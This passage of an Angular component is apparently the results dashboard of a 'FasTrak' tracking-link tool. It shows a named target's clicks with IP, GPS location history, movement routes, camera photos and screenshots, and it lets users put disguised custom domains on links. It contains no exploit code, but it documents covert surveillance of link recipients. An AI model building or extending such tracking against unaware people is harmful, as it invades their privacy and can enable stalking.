import { Component, OnInit, AfterViewInit, OnDestroy, ElementRef, ViewChild } from '@angular/core';
import { CommonModule } from '@angular/common';
import { FormsModule } from '@angular/forms';
import { Router, ActivatedRoute } from '@angular/router';
import { MatDialog, MatDialogModule } from '@angular/material/dialog';
import { HeaderComponent } from '../../common/header/header.component';
import { SidebarComponent } from '../../common/slidebar/sidebar.components';
import { ClickDetailsDialogComponent } from '../click-details-dialog/click-details-dialog.component';
import { BotInfoDialogComponent, BotInfoData } from '../bot-info-dialog/bot-info-dialog.component';
import {
  TrackingLinksService,
  AnalyticsClick,
  AnalyticsResponse,
  ClickDetailsResponse,
  LinkDomainItem,
  SetLinkDomainPayload,
  PreviewFetch,
} from '../../../services/tracking-links/tracking-links.service';
import { Subject } from 'rxjs';
import * as L from 'leaflet';
import { environment } from '../../../../environments/environment';

export interface RecentClickRow {
  timestamp: string;
  ipAddress: string;
  hasGps: boolean;
  photosCount: number;
  hasScreenshot: boolean;
  device: string;
  resolution: string;
  referrer: string;
  userAgent: string;
  /** Raw click for dialog */
  raw?: AnalyticsClick;
}

/** Unified row for Visitor Interaction Details (clicks + link forwarded) */
export interface VisitorInteractionRow {
  timestamp: string;
  ipAddress: string;
  hasGps: boolean;
  photosCount: number;
  hasScreenshot: boolean;
  device: string;
  resolution: string;
  referrer: string;
  userAgent: string;
  source?: string;
  ipCountry?: string;
  isPreviewFetch: boolean;
  is_bot?: boolean;
  raw?: AnalyticsClick;
}

export interface MapMarker {
  lat: number;
  lng: number;
  source: 'gps' | 'ip';
  label: string;
  timestamp?: string;
  city?: string;
  region?: string;
  country?: string;
}

interface RoutePoint {
  lat: number;
  lng: number;
  timestamp?: string;
  accuracy?: number;
  altitude?: number;
  speed?: number;
  heading?: number;
  locationName?: string;
  sequence: number;
}

interface UserRoute {
  id: string;
  label: string;
  color: string;
  sessionId?: string;
  clickTimestamp?: string;
  points: RoutePoint[];
}

@Component({
  selector: 'app-tracking-link-result',
  imports: [CommonModule, FormsModule, MatDialogModule, HeaderComponent, SidebarComponent],
  templateUrl: './tracking-link-result.component.html',
  styleUrl: './tracking-link-result.component.css',
})
export class TrackingLinkResultComponent implements OnInit, AfterViewInit, OnDestroy {
  linkId: string | null = null;
  /** From navigation state; required for analytics API */
  alias: string | null = null;
  accessCode: string | null = null;

  destinationUrl: string = '';
  trackingUrl: string = '';
  shortRedirectUrl: string = '';
  qrCodeDataUrl: string = '';
  targetName: string = '';
  domainInput: string = '';
  /** Domains from API, sorted by displayOrder then createdAt */
  domainOptionsList: LinkDomainItem[] = [];
  domainsLoading = false;
  setDomainLoading = false;
  setDomainError: string | null = null;

  /** Popup for changing domain / making custom link (reuses success-popup UI) */
  showDomainPopup = false;
  popupSelectedDomain: string = '';
  popupSelectedExtension: string = '';
  popupSelectedPath: string = '';
  popupSelectedParameter: string = '';
  openComboDropdown: 'domain' | 'extension' | 'path' | 'parameter' | null = null;
  private applyCustomizationDebounce: ReturnType<typeof setTimeout> | null = null;
  extensionOptions: string[] = [];
  pathOptions: string[] = [];
  parameterOptions: string[] = [];

  recentClicks: RecentClickRow[] = [];
  /** Unified clicks + link forwarded for Visitor Interaction Details table */
  visitorInteractions: VisitorInteractionRow[] = [];
  /** When true, hide rows where is_bot is true */
  hideBots = false;

  analyticsLoading = false;
  analyticsError: string | null = null;

  /** True briefly after user copies the tracking URL */
  trackingUrlCopied = false;
  shortRedirectUrlCopied = false;

  fromDate: string = '';
  toDate: string = '';
  totalClicks: number = 0;
  uniqueVisitors: number = 0;
  countriesCount: number = 0;
  vpnProxyCount: number = 0;
  linkForwardedCount: number = 0;
  previewFetches: PreviewFetch[] = [];
  gpsCount: number = 0;
  caseNotes: string = '';
  notesLoading = false;
  notesSaving = false;
  notesError: string | null = null;
  notesSuccess: string | null = null;
  private notesSuccessTimeout: ReturnType<typeof setTimeout> | null = null;
  private readonly analyticsRefreshIntervalMs = 15_000;
  private analyticsRefreshInterval: ReturnType<typeof setInterval> | null = null;

  browserDistribution: { label: string; value: number; percent: number }[] = [];
  osDistribution: { label: string; value: number; percent: number }[] = [];
  topCountries: { name: string; count: number }[] = [];

  @ViewChild('mapContainer', { read: ElementRef }) mapContainer?: ElementRef<HTMLDivElement>;
  private map: L.Map | null = null;
  mapMarkers: MapMarker[] = [];
  userRoutes: UserRoute[] = [];
  selectedRouteId: string = 'all';
  private readonly routeColors = ['#22c55e', '#3b82f6', '#a855f7', '#f97316', '#ef4444', '#14b8a6'];

  /** Domain strings for the select (from domainOptionsList) */
  get domainOptions(): string[] {
    return this.domainOptionsList.map((d) => d.domain);
  }

  /** Visitor interactions filtered by Hide Bots toggle */
  get filteredVisitorInteractions(): VisitorInteractionRow[] {
    if (!this.hideBots) return this.visitorInteractions;
    return this.visitorInteractions.filter((r) => r.is_bot !== true);
  }

  /** Geographic Distribution header counters (based on plotted marker types). */
  get mapGpsCount(): number {
    return this.mapMarkers.filter((m) => m.source === 'gps').length;
  }

  get mapIpCount(): number {
    return this.mapMarkers.filter((m) => m.source === 'ip').length;
  }

  get activeUserRoutes(): UserRoute[] {
    if (this.selectedRouteId === 'all') return this.userRoutes;
    return this.userRoutes.filter((r) => r.id === this.selectedRouteId);
  }

  constructor(
    private router: Router,
    private route: ActivatedRoute,
    private dialog: MatDialog,
    private trackingLinksService: TrackingLinksService
  ) {
    const nav = this.router.getCurrentNavigation();
    const state = nav?.extras?.state as { alias?: string; accessCode?: string } | undefined;
    if (state?.alias) this.alias = state.alias;
    if (state?.accessCode) this.accessCode = state.accessCode;
  }

  ngOnInit() {
    this.linkId = this.route.snapshot.paramMap.get('id');
    this.loadLinkDomains();
    if (this.linkId) {
      this.loadNotes();
    }
    if (!this.alias || !this.accessCode) {
      this.analyticsError = 'Missing link data. Please open this page from the tracking links list.';
      return;
    }
    this.loadAnalytics();
    this.startAnalyticsAutoRefresh();
  }

  ngAfterViewInit() {
    // Map is initialized when analytics load (see loadSummaryAndDistributions)
  }

  ngOnDestroy() {
    this.stopAnalyticsAutoRefresh();
    this.destroyMap();
    if (this.notesSuccessTimeout) {
      clearTimeout(this.notesSuccessTimeout);
      this.notesSuccessTimeout = null;
    }
  }

  /** FasTrak result view: poll analytics while this route is active. */
  private startAnalyticsAutoRefresh(): void {
    this.stopAnalyticsAutoRefresh();
    this.analyticsRefreshInterval = setInterval(() => {
      if (!this.alias || !this.accessCode) return;
      if (this.analyticsLoading) return;
      this.loadAnalytics();
    }, this.analyticsRefreshIntervalMs);
  }

  private stopAnalyticsAutoRefresh(): void {
    if (this.analyticsRefreshInterval !== null) {
      clearInterval(this.analyticsRefreshInterval);
      this.analyticsRefreshInterval = null;
    }
  }

  /** Load domains from API, sorted by displayOrder then createdAt */
  loadLinkDomains() {
    this.domainsLoading = true;
    this.trackingLinksService.getLinkDomains().subscribe({
      next: (res) => {
        this.domainsLoading = false;
        const list = res?.data?.domains ?? [];
        this.domainOptionsList = [...list].sort((a, b) => {
          if (a.displayOrder !== b.displayOrder) return a.displayOrder - b.displayOrder;
          return new Date(a.createdAt).getTime() - new Date(b.createdAt).getTime();
        });
      },
      error: () => {
        this.domainsLoading = false;
        this.domainOptionsList = [];
      },
    });
  }

  loadAnalytics() {
    if (!this.alias || !this.accessCode) return;
    this.analyticsError = null;
    this.analyticsLoading = true;
    this.trackingLinksService.getAnalytics(this.alias, this.accessCode).subscribe({
      next: (res: AnalyticsResponse) => {
        this.analyticsLoading = false;
        this.destinationUrl = res.link.destinationUrl || '';
        this.trackingUrl = res.link.trackingUrl || '';
        this.shortRedirectUrl = res.link.shortRedirectUrl || '';
        this.qrCodeDataUrl = res.link.qrCodeDataUrl || '';
        this.targetName = res.link.targetName || '';
        try {
          const url = new URL(this.trackingUrl);
          this.domainInput = url.origin;
        } catch {
          this.domainInput = '';
        }
        this.recentClicks = (res.clicks || []).map((c) => this.mapClickToRow(c));
        this.totalClicks = res.link.clickCount ?? this.recentClicks.length;
        this.uniqueVisitors = res.link.uniqueVisitors ?? 0;
        this.previewFetches = res.previewFetches ?? [];
        this.linkForwardedCount = this.previewFetches.length;
        this.buildVisitorInteractions();
        this.loadSummaryAndDistributions();
      },
      error: (err) => {
        this.analyticsLoading = false;
        this.analyticsError =
          err?.error?.message || err?.message || 'Failed to load analytics. Please try again.';
      },
    });
  }

  private mapClickToRow(c: AnalyticsClick): RecentClickRow {
    const d = new Date(c.timestamp);
    const timestamp = d.toLocaleString('en-IN', {
      day: '2-digit',
      month: 'short',
      year: 'numeric',
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
      hour12: true,
    });
    const device = [c.browser, c.os].filter(Boolean).join(' / ') || '—';
    const resolution = `${c.screenWidth || 0}x${c.screenHeight || 0}`;
    return {
      timestamp,
      ipAddress: c.ipAddress || '—',
      hasGps:
        (typeof c.gpsLatitude === 'number' && typeof c.gpsLongitude === 'number') ||
        (c.locationHistory ?? []).some(
          (p) => typeof p?.latitude === 'number' && typeof p?.longitude === 'number'
        ),
      photosCount: c.hasCameraPhotos ? 5 : 0,
      hasScreenshot: !!c.hasScreenshot,
      device,
      resolution,
      referrer: c.referrer || '—',
      userAgent: c.userAgent || '',
      raw: c,
    };
  }

  private mapPreviewFetchToRow(f: PreviewFetch): VisitorInteractionRow {
    const d = new Date(f.timestamp);
    const timestamp = d.toLocaleString('en-IN', {
      day: '2-digit',
      month: 'short',
      year: 'numeric',
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
      hour12: true,
    });
    return {
      timestamp,
      ipAddress: f.ipAddress || '',
      hasGps: false,
      photosCount: 0,
      hasScreenshot: false,
      device: '',
      resolution: '',
      referrer: f.referrer ?? '',
      userAgent: f.userAgent || '',
      source: f.source ?? '',
      ipCountry: f.ipCountry ?? '',
      isPreviewFetch: true,
      is_bot: f.is_bot === true,
    };
  }

  private buildVisitorInteractions(): void {
    const clickRows: VisitorInteractionRow[] = (this.recentClicks || []).map((r) => ({
      ...r,
      userAgent: r.userAgent ?? r.raw?.userAgent ?? '',
      source: r.raw?.source ?? '',
      ipCountry: r.raw?.ipCountry ?? '',
      isPreviewFetch: false,
      is_bot: false,
    }));
    const previewRows: VisitorInteractionRow[] = (this.previewFetches || []).map((f) =>
      this.mapPreviewFetchToRow(f)
    );
    const withSortKey = [
      ...clickRows.map((r) => ({ row: r, ts: r.raw?.timestamp ?? '' })),
      ...(this.previewFetches || []).map((f, i) => ({ row: previewRows[i], ts: f.timestamp })),
    ];
    withSortKey.sort((a, b) => new Date(b.ts).getTime() - new Date(a.ts).getTime());
    this.visitorInteractions = withSortKey.map((x) => x.row);
  }

  loadSummaryAndDistributions() {
    this.gpsCount = this.recentClicks.filter((c) => c.hasGps).length;
    const byBrowser = new Map<string, number>();
    const byOs = new Map<string, number>();
    const byCountry = new Map<string, number>();
    let vpnOrProxy = 0;
    this.recentClicks.forEach((r) => {
      const [browser = 'Unknown', os = 'Unknown'] = r.device.split(' / ');
      byBrowser.set(browser, (byBrowser.get(browser) ?? 0) + 1);
      byOs.set(os, (byOs.get(os) ?? 0) + 1);
      const raw = r.raw as { ipCountry?: string; ipProxy?: boolean; ipVpn?: boolean } | undefined;
      if (raw?.ipCountry) {
        const country = String(raw.ipCountry).trim() || 'Unknown';
        byCountry.set(country, (byCountry.get(country) ?? 0) + 1);
      }
      if (raw && (raw.ipProxy === true || raw.ipVpn === true)) {
        vpnOrProxy += 1;
      }
    });
    const total = this.recentClicks.length || 1;
    this.browserDistribution = Array.from(byBrowser.entries()).map(([label, value]) => ({
      label,
      value,
      percent: Math.round((value / total) * 100),
    }));
    this.osDistribution = Array.from(byOs.entries()).map(([label, value]) => ({
      label,
      value,
      percent: Math.round((value / total) * 100),
    }));
    this.countriesCount = byCountry.size;
    this.vpnProxyCount = vpnOrProxy;
    this.topCountries = Array.from(byCountry.entries())
      .map(([name, count]) => ({ name, count }))
      .sort((a, b) => b.count - a.count);

    this.buildUserRoutes();
    this.buildMapMarkers();
    setTimeout(() => this.initMap(), 0);
  }

  private buildUserRoutes(): void {
    const routes: UserRoute[] = [];
    let routeIndex = 0;

    this.recentClicks.forEach((row) => {
      const click = row.raw as AnalyticsClick | undefined;
      if (!click) return;
      const fallbackLocationName = [click.ipCity, click.ipRegion, click.ipCountry]
        .map((v) => (v || '').trim())
        .filter((v) => !!v)
        .join(', ') || undefined;

      const history = Array.isArray(click.locationHistory) ? click.locationHistory : [];
      const points: RoutePoint[] = history
        .filter(
          (p) => typeof p?.latitude === 'number' && typeof p?.longitude === 'number'
        )
        .sort((a, b) => {
          const ta = a?.timestamp ? new Date(a.timestamp).getTime() : 0;
          const tb = b?.timestamp ? new Date(b.timestamp).getTime() : 0;
          return ta - tb;
        })
        .map((p, idx) => ({
          lat: p.latitude as number,
          lng: p.longitude as number,
          timestamp: p.timestamp,
          accuracy: typeof p?.accuracy === 'number' ? p.accuracy : undefined,
          altitude: typeof p?.altitude === 'number' ? p.altitude : undefined,
          speed: typeof p?.speed === 'number' ? p.speed : undefined,
          heading: typeof p?.heading === 'number' ? p.heading : undefined,
          locationName: fallbackLocationName,
          sequence: idx + 1,
        }));

      if (points.length === 0 && typeof click.gpsLatitude === 'number' && typeof click.gpsLongitude === 'number') {
        const gpsAltitude =
          typeof (click as any).gpsAltitude === 'number' ? (click as any).gpsAltitude : undefined;
        points.push({
          lat: click.gpsLatitude,
          lng: click.gpsLongitude,
          timestamp: click.timestamp,
          accuracy: typeof click.gpsAccuracy === 'number' ? click.gpsAccuracy : undefined,
          altitude: gpsAltitude,
          locationName: fallbackLocationName,
          sequence: 1,
        });
      }

      if (points.length === 0) return;

      routeIndex += 1;
      routes.push({
        id: click.id || click.sessionId || `route-${routeIndex}`,
        label: `Click ${routeIndex}`,
        color: this.routeColors[(routeIndex - 1) % this.routeColors.length],
        sessionId: click.sessionId,
        clickTimestamp: click.timestamp,
        points,
      });
    });

    this.userRoutes = routes;
    if (this.selectedRouteId !== 'all' && !this.userRoutes.some((r) => r.id === this.selectedRouteId)) {
      this.selectedRouteId = 'all';
    }
  }

  private buildMapMarkers(): void {
    this.mapMarkers = [];
    this.recentClicks.forEach((row) => {
      const c = row.raw as AnalyticsClick;
      if (!c) return;
      const parts = [c.ipCity, c.ipRegion, c.ipCountry].filter(Boolean);
      const baseLabel = parts.length > 0 ? parts.join(', ') : '';

      // GPS markers from continuous tracking history (all points)
      const gpsHistory = Array.isArray(c.locationHistory) ? c.locationHistory : [];
      gpsHistory.forEach((p) => {
        const lat = p?.latitude;
        const lng = p?.longitude;
        if (typeof lat !== 'number' || typeof lng !== 'number') return;
        const label = baseLabel ? `GPS: ${baseLabel}` : `GPS: ${lat.toFixed(4)}, ${lng.toFixed(4)}`;
        this.mapMarkers.push({
          lat,
          lng,
          source: 'gps',
          label,
          timestamp: p.timestamp,
          city: c.ipCity,
          region: c.ipRegion,
          country: c.ipCountry,
        });
      });

      // Backward-compatibility for old clicks without locationHistory.
      if (
        gpsHistory.length === 0 &&
        typeof c.gpsLatitude === 'number' &&
        typeof c.gpsLongitude === 'number'
      ) {
        const label = baseLabel
          ? `GPS: ${baseLabel}`
          : `GPS: ${c.gpsLatitude.toFixed(4)}, ${c.gpsLongitude.toFixed(4)}`;
        this.mapMarkers.push({
          lat: c.gpsLatitude,
          lng: c.gpsLongitude,
          source: 'gps',
          label,
          timestamp: c.timestamp,
          city: c.ipCity,
          region: c.ipRegion,
          country: c.ipCountry,
        });
      }

      // IP marker (geolocation from IP) — separate from GPS so both can be visible
      const ipLat = c.ipLatitude;
      const ipLng = c.ipLongitude;
      if (ipLat != null && ipLng != null && typeof ipLat === 'number' && typeof ipLng === 'number') {
        const label = baseLabel ? `IP: ${baseLabel}` : `IP: ${ipLat.toFixed(4)}, ${ipLng.toFixed(4)}`;
        this.mapMarkers.push({
          lat: ipLat,
          lng: ipLng,
          source: 'ip',
          label,
          city: c.ipCity,
          region: c.ipRegion,
          country: c.ipCountry,
        });
      }
    });
  }

  private initMap(): void {
    if (!this.mapContainer?.nativeElement) return;
    this.destroyMap();
    const el = this.mapContainer.nativeElement;
    const defaultCenter: L.LatLngExpression = [20.5937, 78.9629]; // India center
    const defaultZoom = 3;
    this.map = L.map(el, {
      center: defaultCenter,
      zoom: defaultZoom,
      zoomControl: true,
    });
    // CARTO Voyager – requires API key (set environment.cartoApiKey)
    const cartoKey = (environment.cartoApiKey || '').trim();
    const cartoTileUrl = cartoKey
      ? `https://{s}.basemaps.cartocdn.com/rastertiles/voyager/{z}/{x}/{y}.png?key=${encodeURIComponent(cartoKey)}`
      : 'https://{s}.basemaps.cartocdn.com/rastertiles/voyager/{z}/{x}/{y}.png';
    L.tileLayer(cartoTileUrl, {
      attribution: '&copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors &copy; <a href="https://carto.com/attributions">CARTO</a>',
      subdomains: 'abcd',
      maxZoom: 19,
      maxNativeZoom: 19,
      minZoom: 1,
    }).addTo(this.map);

    const ipIcon = L.divIcon({
      className: 'visitor-map-marker visitor-map-marker-ip',
      html: '<i class="fas fa-globe"></i>',
      iconSize: [24, 24],
      iconAnchor: [12, 24],
    });

    const bounds: L.LatLngBoundsExpression = [];
    this.mapMarkers.forEach((m) => {
      if (m.source !== 'ip') return;
      L.marker([m.lat, m.lng], { icon: ipIcon })
        .addTo(this.map!)
        .bindTooltip(`<div class="visitor-map-popup"><strong>IP</strong><br/>${m.label}</div>`, {
          permanent: false,
          direction: 'top',
        });
      (bounds as L.LatLngTuple[]).push([m.lat, m.lng]);
    });

    this.activeUserRoutes.forEach((route) => {
      const latLngs = route.points.map((p) => [p.lat, p.lng] as L.LatLngTuple);
      if (latLngs.length > 1) {
        L.polyline(latLngs, {
          color: route.color,
          weight: 4,
          opacity: 0.95,
        }).addTo(this.map!);
      }

      route.points.forEach((point, idx) => {
        const isStart = idx === 0;
        const isEnd = idx === route.points.length - 1;
        const markerHtml = isStart
          ? `<span class="route-point-pill route-point-start" style="--route-color:${route.color}">S</span>`
          : isEnd
            ? `<span class="route-point-pill route-point-end" style="--route-color:${route.color}">E</span>`
            : `<span class="route-point-pill" style="--route-color:${route.color}">${point.sequence}</span>`;
        const markerIcon = L.divIcon({
          className: 'visitor-map-marker visitor-map-marker-route',
          html: markerHtml,
          iconSize: [26, 26],
          iconAnchor: [13, 13],
        });

        const timestampText = point.timestamp ? this.formatPreviewTimestamp(point.timestamp) : '—';
        const locationText = point.locationName || `${point.lat.toFixed(4)}, ${point.lng.toFixed(4)}`;
        const accuracyText = point.accuracy != null ? `${point.accuracy} m` : '—';
        const altitudeText = point.altitude != null ? `${Math.round(point.altitude)} m` : '—';
        const speedText = point.speed != null ? `${Math.round(point.speed)} m/s` : '—';
        const latitudeText = Number.isFinite(point.lat) ? point.lat.toFixed(8) : '—';
        const longitudeText = Number.isFinite(point.lng) ? point.lng.toFixed(8) : '—';
        L.marker([point.lat, point.lng], { icon: markerIcon })
          .addTo(this.map!)
          .bindTooltip(
            `<div class="visitor-map-popup">
              <strong>${route.label}</strong><br/>
              Point ${point.sequence}${isStart ? ' (Start)' : isEnd ? ' (End)' : ''}<br/>
              Location: ${locationText}<br/>
              Latitude: ${latitudeText}<br/>
              Longitude: ${longitudeText}<br/>
              Accuracy: ${accuracyText}<br/>
              ${timestampText}<br/>
              Speed: ${speedText}<br/>
              Altitude: ${altitudeText}
            </div>`,
            {
              permanent: false,
              direction: 'top',
              opacity: 0.98,
            }
          );
        (bounds as L.LatLngTuple[]).push([point.lat, point.lng]);
      });
    });

    if (this.mapMarkers.length === 1) {
      this.map!.setView([this.mapMarkers[0].lat, this.mapMarkers[0].lng], 10);
    } else if ((bounds as L.LatLngTuple[]).length > 1) {
      try {
        this.map!.fitBounds(bounds as L.LatLngBoundsExpression, { padding: [20, 20], maxZoom: 15 });
      } catch {
        const fallback = (bounds as L.LatLngTuple[])[0];
        this.map!.setView(fallback, 15);
      }
    } else if ((bounds as L.LatLngTuple[]).length === 1) {
      this.map!.setView((bounds as L.LatLngTuple[])[0], 12);
    }
    // If no markers, map shows default view (India center)

    // Ensure map tiles/layout render correctly after container paint.
    setTimeout(() => this.map?.invalidateSize(), 50);
  }

  private destroyMap(): void {
    if (this.map) {
      this.map.remove();
      this.map = null;
    }
  }

  onSelectRoute(routeId: string): void {
    this.selectedRouteId = routeId;
    setTimeout(() => this.initMap(), 0);
  }

  formatRoutePointTimestamp(ts?: string): string {
    if (!ts) return '—';
    return this.formatPreviewTimestamp(ts);
  }

  onClearDateFilter() {
    this.fromDate = '';
    this.toDate = '';
  }

  loadNotes() {
    if (!this.linkId) return;
    this.notesError = null;
    this.notesLoading = true;
    this.trackingLinksService.getNotes(this.linkId).subscribe({
      next: (res) => {
        this.notesLoading = false;
        this.caseNotes = res.notes ?? '';
      },
      error: () => {
        this.notesLoading = false;
        this.caseNotes = '';
      },
    });
  }

  onSaveNotes() {
    if (!this.linkId) return;
    this.notesError = null;
    this.notesSuccess = null;
    this.notesSaving = true;
    this.trackingLinksService.updateNotes(this.linkId, this.caseNotes ?? '').subscribe({
      next: (res) => {
        this.notesSaving = false;
        this.caseNotes = res.notes ?? '';
        this.notesSuccess = 'Notes saved successfully.';
        this.clearNotesSuccessAfterDelay();
      },
      error: (err) => {
        this.notesSaving = false;
        this.notesError =
          err?.error?.message || err?.message || 'Failed to save notes. Please try again.';
      },
    });
  }

  private clearNotesSuccessAfterDelay() {
    if (this.notesSuccessTimeout) clearTimeout(this.notesSuccessTimeout);
    this.notesSuccessTimeout = setTimeout(() => {
      this.notesSuccess = null;
      this.notesSuccessTimeout = null;
    }, 3000);
  }

  /** Open the Change domain / make custom link popup */
  onOpenDomainPopup() {
    if (!this.linkId) return;
    this.showDomainPopup = true;
    this.popupSelectedDomain = this.domainInput || '';
    this.popupSelectedExtension = '';
    this.popupSelectedPath = '';
    this.popupSelectedParameter = '';
    this.openComboDropdown = null;
    this.setDomainError = null;
    this.loadLinkCustomizationConfig();
  }

  /** Load extension/path/parameter options from GET /api/admin/link-customization-config */
  loadLinkCustomizationConfig() {
    this.trackingLinksService.getLinkCustomizationConfig().subscribe({
      next: (res) => {
        const d = res?.data;
        if (d?.extensions?.length) this.extensionOptions = d.extensions;
        if (d?.paths?.length) this.pathOptions = d.paths;
        if (d?.parameters?.length) this.parameterOptions = d.parameters;
      },
      error: () => {
        // keep default options on error
      },
    });
  }

  onCloseDomainPopup() {
    this.showDomainPopup = false;
    this.openComboDropdown = null;
  }

  /** Reset link domain and custom path/parameter/extension to defaults via API, then update UI and popup form */
  onResetDomainForm() {
    if (!this.linkId) return;
    this.setDomainError = null;
    this.setDomainLoading = true;
    this.trackingLinksService.setLinkDomain({ id: this.linkId, reset: true }).subscribe({
      next: (res) => {
        this.setDomainLoading = false;
        this.trackingUrl = res.trackingUrl || '';
        this.shortRedirectUrl = res.shortRedirectUrl || '';
        this.qrCodeDataUrl = res.qrCodeDataUrl || '';
        try {
          const url = new URL(this.trackingUrl);
          this.domainInput = url.origin;
        } catch {
          this.domainInput = '';
        }
        this.popupSelectedDomain = this.domainInput || '';
        this.popupSelectedExtension = '';
        this.popupSelectedPath = '';
        this.popupSelectedParameter = '';
      },
      error: (err) => {
        this.setDomainLoading = false;
        this.setDomainError =
          err?.error?.error || err?.error?.message || err?.message || 'Failed to reset link.';
      },
    });
  }

  onDomainChange() {
    if (!this.linkId || !this.domainInput?.trim()) return;
    const trimmed = this.domainInput.trim().replace(/\/$/, '');
    const domainItem = this.domainOptionsList.find((d) => d.domain === trimmed);
    const domainId = domainItem?.id;
    if (!domainId) return;
    this.setDomainError = null;
    this.setDomainLoading = true;
    const payload: SetLinkDomainPayload = {
      id: this.linkId,
      domainId,
      customPath: this.popupSelectedPath?.trim() || undefined,
      customParameter: this.popupSelectedParameter?.trim() || undefined,
      customExtension: this.popupSelectedExtension?.trim() || undefined,
    };
    this.trackingLinksService.setLinkDomain(payload).subscribe({
      next: (res) => {
        this.setDomainLoading = false;
        this.trackingUrl = res.trackingUrl || '';
        this.shortRedirectUrl = res.shortRedirectUrl || '';
        this.qrCodeDataUrl = res.qrCodeDataUrl || '';
      },
      error: (err) => {
        this.setDomainLoading = false;
        this.setDomainError =
          err?.error?.error || err?.error?.message || err?.message || 'Failed to change domain.';
      },
    });
  }

  /** Domain change from popup select (no separate Apply button) */
  onPopupDomainChange(domain: string) {
    const trimmed = (domain || '').trim().replace(/\/$/, '');
    if (!this.linkId || !trimmed) return;
    const domainItem = this.domainOptionsList.find((d) => d.domain === trimmed);
    const domainId = domainItem?.id;
    if (!domainId) return;
    this.popupSelectedDomain = trimmed;
    this.domainInput = trimmed;
    this.setDomainError = null;
    this.setDomainLoading = true;
    const payload: SetLinkDomainPayload = {
      id: this.linkId,
      domainId,
      customPath: this.popupSelectedPath?.trim() || undefined,
      customParameter: this.popupSelectedParameter?.trim() || undefined,
      customExtension: this.popupSelectedExtension?.trim() || undefined,
    };
    this.trackingLinksService.setLinkDomain(payload).subscribe({
      next: (res) => {
        this.setDomainLoading = false;
        this.trackingUrl = res.trackingUrl || '';
        this.shortRedirectUrl = res.shortRedirectUrl || '';
        this.qrCodeDataUrl = res.qrCodeDataUrl || '';
      },
      error: (err) => {
        this.setDomainLoading = false;
        this.setDomainError =
          err?.error?.error || err?.error?.message || err?.message || 'Failed to change domain.';
      },
    });
  }

  /** Apply current extension/path/parameter to tracking link (same as domain change – updates link immediately) */
  applyPopupCustomization() {
    if (!this.linkId || !this.popupSelectedDomain) return;
    const domainItem = this.domainOptionsList.find((d) => d.domain === this.popupSelectedDomain);
    const domainId = domainItem?.id;
    if (!domainId) return;
    this.setDomainError = null;
    this.setDomainLoading = true;
    const payload: SetLinkDomainPayload = {
      id: this.linkId,
      domainId,
      customPath: this.popupSelectedPath?.trim() || undefined,
      customParameter: this.popupSelectedParameter?.trim() || undefined,
      customExtension: this.popupSelectedExtension?.trim() || undefined,
    };
    this.trackingLinksService.setLinkDomain(payload).subscribe({
      next: (res) => {
        this.setDomainLoading = false;
        this.trackingUrl = res.trackingUrl || '';
        this.shortRedirectUrl = res.shortRedirectUrl || '';
        this.qrCodeDataUrl = res.qrCodeDataUrl || '';
      },
      error: (err) => {
        this.setDomainLoading = false;
        this.setDomainError =
          err?.error?.error || err?.error?.message || err?.message || 'Failed to update link.';
      },
    });
  }

  /** Called from (ngModelChange) on extension/path/parameter – debounced so we don't call API on every keystroke */
  onPopupCustomizationInputChange() {
    if (this.applyCustomizationDebounce) clearTimeout(this.applyCustomizationDebounce);
    this.applyCustomizationDebounce = setTimeout(() => {
      this.applyPopupCustomization();
      this.applyCustomizationDebounce = null;
    }, 400);
  }

  /** Open combo dropdown (domain, extension, path, or parameter) */
  openCombo(field: 'domain' | 'extension' | 'path' | 'parameter') {
    this.openComboDropdown = this.openComboDropdown === field ? null : field;
  }

  /** Select option from combo and close dropdown; then apply to update tracking link */
  selectComboOption(field: 'domain' | 'extension' | 'path' | 'parameter', value: string) {
    if (field === 'domain') {
      this.popupSelectedDomain = value;
      this.openComboDropdown = null;
      this.onPopupDomainChange(value);
      return;
    }
    if (field === 'extension') this.popupSelectedExtension = value;
    else if (field === 'path') this.popupSelectedPath = value;
    else this.popupSelectedParameter = value;
    this.openComboDropdown = null;
    this.applyPopupCustomization();
  }

  onBackClick() {
    this.router.navigate(['/generate-tracking-link']);
  }

  onExportData() {
    // TODO: wire to export API (Excel/CSV)
  }

  onCopyTrackingLink() {
    if (!this.trackingUrl) return;
    navigator.clipboard.writeText(this.trackingUrl).then(
      () => {
        this.trackingUrlCopied = true;
        setTimeout(() => (this.trackingUrlCopied = false), 2000);
      },
      () => { }
    );
  }

  onCopyShortRedirectUrl() {
    if (!this.shortRedirectUrl) return;
    navigator.clipboard.writeText(this.shortRedirectUrl).then(
      () => {
        this.shortRedirectUrlCopied = true;
        setTimeout(() => (this.shortRedirectUrlCopied = false), 2000);
      },
      () => { }
    );
  }

  onDownloadQrCode() {
    if (!this.qrCodeDataUrl) return;
    const anchor = document.createElement('a');
    anchor.href = this.qrCodeDataUrl;
    anchor.download = `fastrak-qr-${this.linkId || this.alias || 'link'}.png`;
    document.body.appendChild(anchor);
    anchor.click();
    document.body.removeChild(anchor);
  }

  async onShareQrCode() {
    if (!this.qrCodeDataUrl || !this.trackingUrl) return;
    const title = `FasTrak Link - ${this.targetName || this.alias || 'Tracking link'}`;

    try {
      if (navigator.share) {
        if (navigator.canShare) {
          const file = new File([this.dataUrlToBlob(this.qrCodeDataUrl)], 'fastrak-qr.png', {
            type: 'image/png',
          });
          if (navigator.canShare({ files: [file] })) {
            await navigator.share({
              title,
              text: this.trackingUrl,
              files: [file],
            });
            return;
          }
        }
        await navigator.share({
          title,
          text: this.trackingUrl,
          url: this.trackingUrl,
        });
        return;
      }
    } catch {
      // Ignore cancelled/unsupported share and fallback to copy.
    }

    this.onCopyTrackingLink();
  }

  private dataUrlToBlob(dataUrl: string): Blob {
    const [meta, base64Payload] = dataUrl.split(',');
    const mimeMatch = /data:(.*?);base64/.exec(meta || '');
    const mime = mimeMatch?.[1] || 'image/png';
    const binary = atob(base64Payload || '');
    const bytes = new Uint8Array(binary.length);
    for (let i = 0; i < binary.length; i++) {
      bytes[i] = binary.charCodeAt(i);
    }
    return new Blob([bytes], { type: mime });
  }

  formatPreviewTimestamp(ts: string): string {
    try {
      const d = new Date(ts);
      return d.toLocaleString('en-IN', {
        day: '2-digit',
        month: 'short',
        year: 'numeric',
        hour: '2-digit',
        minute: '2-digit',
        second: '2-digit',
        hour12: true,
      });
    } catch {
      return ts;
    }
  }

  onBotInfoClick(row: VisitorInteractionRow, event: Event): void {
    event.stopPropagation();
    const data: BotInfoData = {
      timestamp: row.timestamp,
